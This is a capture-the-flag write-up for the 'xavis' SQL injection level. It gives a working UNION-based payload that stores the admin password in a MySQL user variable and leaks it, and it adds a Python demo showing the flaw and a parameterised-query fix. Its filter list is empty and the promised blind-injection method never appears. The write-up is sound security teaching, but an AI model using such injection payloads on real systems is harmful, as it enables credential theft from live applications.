
xavis


We are provided with the SQL query:

SELECT id FROM prob_xavis WHERE id='admin' AND pw='{$_GET[pw]}'

For this challenge, the password is in Korean. There are two ways of solving this challenge.

Filter

The code filters the following:

There are two ways of solving this challenge:

  1. Assigning the password to a variable and leaking the variable
  2. Blind SQL Injection

Assigning the password to a variable and leaking the variable

If we provide the following URI parameter:

?pw=' or (SELECT @adminpassword:=pw WHERE id='admin') UNION SELECT @adminpassword -- -

The resultant query becomes:

SELECT id FROM prob_xavis WHERE id='admin' AND pw='' or (SELECT @adminpassword:=pw WHERE id='admin') UNION SELECT @adminpassword -- -'


As we can see, the password that was stored in the @adminpassword user variable is returned as the query result, i.e. it has been leaked:

우왕굳
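The root cause is that pw is spliced into the SQL text. The following is an added example (not part of the original writeup) that reproduces the flaw against a constructed in-memory SQLite table and shows the parameterised fix beside it; since SQLite has no MySQL-style @user variables, the payload is the same UNION idea rewritten without the variable assignment.

```python
import sqlite3

# Constructed sample data standing in for the challenge table (not the real LOS database).
ADMIN_PW = "우왕굳"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE prob_xavis (id TEXT, pw TEXT)")
    con.execute("INSERT INTO prob_xavis VALUES ('admin', ?)", (ADMIN_PW,))
    con.execute("INSERT INTO prob_xavis VALUES ('guest', 'guest')")
    return con


def vulnerable_lookup(con, pw):
    # Mirrors the challenge: the pw parameter becomes part of the SQL text.
    sql = f"SELECT id FROM prob_xavis WHERE id='admin' AND pw='{pw}'"
    return [row[0] for row in con.execute(sql)]


def safe_lookup(con, pw):
    # Hardened form: pw travels as a bound parameter and is never parsed as SQL,
    # so quotes, UNION and comment markers inside it are just characters.
    sql = "SELECT id FROM prob_xavis WHERE id='admin' AND pw=?"
    return [row[0] for row in con.execute(sql, (pw,))]


# Same mechanism as the page's payload, adapted for SQLite (no @variables):
# the secret rides back through the single 'id' column of the UNION.
PAYLOAD = "' UNION SELECT pw FROM prob_xavis WHERE id='admin' -- -"


def demo():
    con = make_db()
    return {
        "vuln_payload": vulnerable_lookup(con, PAYLOAD),   # leaks the password
        "safe_payload": safe_lookup(con, PAYLOAD),         # no rows
        "safe_real_pw": safe_lookup(con, ADMIN_PW),        # legitimate login still works
    }


if __name__ == "__main__":
    print(demo())
```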

We can now provide the following URI:

?pw=우왕굳

The resultant query becomes:

SELECT id FROM prob_xavis WHERE id='admin' AND pw='우왕굳'
